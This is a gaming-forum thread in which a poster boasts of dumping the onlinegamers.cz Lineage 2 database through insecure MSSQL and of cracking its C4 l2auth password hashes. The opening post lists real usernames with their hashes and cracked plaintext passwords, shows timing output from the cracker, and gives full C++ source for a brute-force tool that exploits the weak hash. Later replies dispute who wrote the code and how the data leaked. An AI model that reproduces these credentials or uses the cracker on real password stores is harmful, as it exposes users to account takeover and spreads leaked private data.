Onlinegamers.cz - Password of PTS cracked

[SnoopedMan]

We managed to crack C4 l2auth password hashes in nominal time and successfully cracked whole onlinegamers.cz database (it was pretty easy to dump their database cause they don't know how to setup mssql securely), small example:

 

yurii2 : 0x452EE4C0714EC7EBCE88B31ED3496F6F : yurii12345

yurii3 : 0x452EE4C0714EC7EBCE88B31ED3496F6F : yurii12345

yurii4 : 0x452EE4C0714EC7EBCE88B31ED3496F6F : yurii12345

Yuriik : 0xC9D81E75C8EDBE4075ECCACA079DBBBB : vanecka

Yurii : 0xC9D81E75C8EDBE4075ECCACA079DBBBB  vanecka

yurikhan : 0xB539DD269BFD93BE8B123434F9634545 : peter7Y0

yuriko : 0x357A6689B817C47742DBFDFD30AA8C8C : 081p87

Yuri Prime : 0xA52FDE10AD94E98EBB220404C9537575 : litaon

Yuris : 0xA9A0BA5EE764ADA108318127EA705656 : fatimapP13

Yury : 0x25689971CCB29ACDF86147478A103636 : madcji

Yuske : 0xB5B1EDD4696C10A499228B8A47DDFBFB : dfabsf7hw

yusuf : 0x35C266BA03B8D0862FEADAA06DF7D1D1 : AbCbmfKA19N

yusuke : 0xA507789726A97ABBAA748D60AD371111 : lucayd3<eii

 

It's easy cause that hash is CRAP and has looooooooot of collisions...

 

./crack

0xC9D81E75C8EDBE4075ECCACA079DBBBB

vanecka (0xC9D81E75C8EDBE4075ECCACA079DBBBB)

0xC9D81E75C8EDBE4075ECCACA079DBBBB vanecka (took 0 seconds)

0xB539DD269BFD93BE8B123434F9634545

peter7Y0 (0xB539DD269BFD93BE8B123434F9634545)

0xB539DD269BFD93BE8B123434F9634545 peter7Y0 (took 3 seconds)

0x35C266BA03B8D0862FEADAA06DF7D1D1

AbCbmfKA19N (0x35C266BA03B8D0862FEADAA06DF7D1D1)

0x35C266BA03B8D0862FEADAA06DF7D1D1 AbCbmfKA19N (took 3 seconds)

 

 

What do you say to those times? :)

 

 

And it's really easy:

 

#include <map>
#include <fstream>
#include <vector>
#include <iostream>
#include <string>
#include <math.h>
#include <string.h>

std::string encrypt(const std::string &plain)
{
    const static double arrayMul[4] = {213119, 213247, 213203, 213821};
    const static double arrayAdd[4] = {2529077, 2529089, 2529589, 2529997};
    unsigned char dst[16];
    unsigned char key[16];
    memset(dst, 0, 16);
    memset(key, 0, 16);
    double val[4];
    memset(val, 0, sizeof(float)*4);

    for (size_t i(0) ; i < 16 ; ++i) {
        if (plain.size() > i) {
            dst[i] = static_cast<unsigned char>(plain[i]);
            key[i] = static_cast<unsigned char>(plain[i]);
        } else {
            dst[i] = 0;
            key[i] = 0;
        }
    }

    for (size_t i(0) ; i < 4 ; ++i) {
        double x(key[i*4]);
        x += key[i*4+1] << 8;
        x += key[i*4+2] << 16;
        x += key[i*4+3] << 24;
        x *= arrayMul[i];
        x += arrayAdd[i];
        val[i] = fmod(x, 4294967296.0);
    }

    for (size_t i(0) ; i < 4 ; ++i) {
        key[i*4+0] = static_cast<uint32_t>(val[i]) & 0xff;
        key[i*4+1] = static_cast<uint32_t>(val[i] / 0x100) & 0xff;
        key[i*4+2] = static_cast<uint32_t>(val[i] / 0x10000) & 0xff;
        key[i*4+3] = static_cast<uint32_t>(val[i] / 0x1000000) & 0xff;
    }

    dst[0] ^= key[0];
    for (size_t i(1) ; i < 16 ; ++i) {
        dst[i] = dst[i] ^ dst[i-1] ^ key[i];
    }

    for (size_t i(0) ; i < 16 ; ++i) {
        if (!dst[i]) {
            dst[i] = 0x66;
        }
    }

    std::string result("0x");
    for (size_t i(0) ; i < 16 ; ++i) {
        char x[3];
        sprintf(x, "%02X", dst[i]);
        result += x;
    }

    return result;
}

std::string tryPassword(const std::string &hash,
                        const std::string &chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
                        const std::string &possibility = std::string())
{
    std::string result;
    size_t j(possibility.size());
    for (size_t i(0) ; i < chars.size() ; ++i) {
        std::string s(possibility);
        s.push_back(chars[i]);
        std::string enc(encrypt(s));
        // std::cerr << "Trying " << s << std::endl; // comment out to see what we're trying
        if (enc.substr(0, 2+j*2) == hash.substr(0, 2+j*2)) {
            if (enc == hash) {
                std::cerr << s << " (" << enc << ")" << std::endl;
                return s; // comment out to write out all possible passwords xD
            }
            std::string res(tryPassword(hash, chars, s));
            if (!res.empty()) {
                return res;
            }
        }
    }
    return "";
}

int main(int argc, char **argv)
{
    std::map<std::string, std::string> crackMap;
    std::istream *ifs;
    if (argc != 1) {
        ifs = new std::ifstream(argv[1]);
    } else {
        ifs = &std::cin;
    }

    for (;;) {
        if (ifs->eof()) {
            break;
        }

        std::string line;
        getline(*ifs, line);
        if (line.size() == 34) {
            std::map<std::string, std::string>::const_iterator icrackMap(crackMap.find(line));
            if (icrackMap != crackMap.end()) {
                std::cout << line << " " << icrackMap->second << " (from cache)" << std::endl;
                continue;
            }
            time_t t(time(0));
            std::string password(tryPassword(line));
            if (!password.empty()) {
                crackMap.insert(std::make_pair(line, password));
                int seconds(time(0) - t);
                if (seconds < 60) {
                    std::cout << line << " " << password << " (took " << seconds << " seconds)" << std::endl;
                } else if (seconds % 60) {
                    std::cout << line << " " << password << " (took " << (seconds / 60) << " minutes and " << (seconds % 60) << " seconds)" << std::endl;
                } else {
                    std::cout << line << " " << password << " (took " << (seconds / 60) << " minutes" << std::endl;
                }
            }
        } else {
            size_t offset(line.find(":"));
            if (offset != std::string::npos) {
                std::string hash(line.substr(offset+1));
                std::map<std::string, std::string>::const_iterator icrackMap(crackMap.find(hash));
                if (icrackMap != crackMap.end()) {
                    std::cout << line.substr(0, offset) << ":" << icrackMap->second << std::endl;
                    continue;
                }
                std::string password(tryPassword(hash));
                crackMap.insert(std::make_pair(hash, password));
                if (!password.empty()) {
                    std::cout << line.substr(0, offset) << ":" << password << std::endl;
                }
            } else if (!line.empty()) {
                std::cout << line << " " << encrypt(line) << std::endl;
            }
        }
    }

    return 0;
}

So we advise everybody out there using l2auth to switch to MD5 (there are some files needed on postpacific.com)

 

 

[Stefoulis15]

Good job ! Hackers are getting better and better everyday while the developers can't even think why this happends! ^^

[Devangell™]

you start very good man good job!!

[XxAlbBosSxX]

nah its just a copy past ..i sow it somewhereelse

[SnoopedMan]

Trust me, that ist not copy/past... i developed it by myself...

[Lain]

Czech servers suck :D anyways thanks

[ulipispirus]

We managed to crack C4 l2auth password hashes in nominal time and successfully cracked whole onlinegamers.cz database (it was pretty easy to dump their database cause they don't know how to setup mssql securely)

 

It was easy to dump database because admin (poker10) dumped it by yourself, then was fired.

Now admin on GamePark. (Will dump their DB too?)

So this data are from old database, even data do not match.

 

Trust me, that ist not copy/past... i developed it by myself...

 

The code is generic for all PTS login servers with small changes.

So SnoopedMan is cheater on forum, not in game.

[SnoopedMan]

So you think that everyone was able to crack those hashes? Generic code is only the function std::string encrypt(const std::string &plain).. The rest is my code and it was released just here and on EPVP, but they've deleted it there.

[bollix]

heh, but you arent good, this script is from official PTS project

[SnoopedMan]

Function std::string encrypt(const std::string &plain) is from PTS.

Rest is my code.

[ulipispirus]

Function std::string encrypt(const std::string &plain) is from PTS.

Rest is my code.

 

You know "magic numbers" in encoder, so you knows magic numbers in decoder, like: substr(0, 2+j*2)...

 

It is mistery? What if you don't know magic numbers in encoder?

Anything universal for C4 or others?

 

QQ Not your code.

[cyperex]

Good job ! Hackers are getting better and better everyday while the developers can't even think why this happends! ^^

 

Lol, if we dont get worst, were bound to get much better!

 

Good post, your on your way buddy.

[wakowako]

What is this supposed to be?.

[SnoopedMan]

 

OMG

You need encoder to check whether hash you generated starts with right chars.. that hash is crap, cause you can go char-by-char and check just the first 1 byte, first 2 bytes, first 3 bytes, ...

It's really not a cryptographic hash...

 

And substr(0, 2+j*2) means substring of that hash, 2+ because it starts with "0x", that we ignore and j*2 because that hash is encoded in hex to be human-readable...

 

Try to comprehend my code and then write your stupid posts xD

[pandas]

It was easy to dump database because admin (poker10) dumped it by yourself, then was fired.

Now admin on GamePark. (Will dump their DB too?)

So this data are from old database, even data do not match.

Well, it's a little bit more complicated than it is usually presented by people.

First of all, poker10 wasn't fired. Nearly everyone from the "old" Lineage 2 team left at the end of November 08 after several disagreements with Rod, OG president in that time. Some of us (including me and poker10) stayed and helped to keep the game environment running for several weeks, but we were no longer members of the team. We, unluckily, also tried to give the new team some "advices", as they were quite new on their positions, but as both sides were a little bit stubborn, it only led to other disagreements. As poker10 was more offensive for the taste of new team, the major "blame" was laid on his head. And, thanks to "slightly inadequate" behaviour of martinus and some other members, the legend of "poker10 fired from OG" was born.

 

Hope this helps the legend to die.

 

Best regards,

Jan "Pandas" Smitka

Onlinegamers.cz, o.s. Lineage 2 ex-head-admin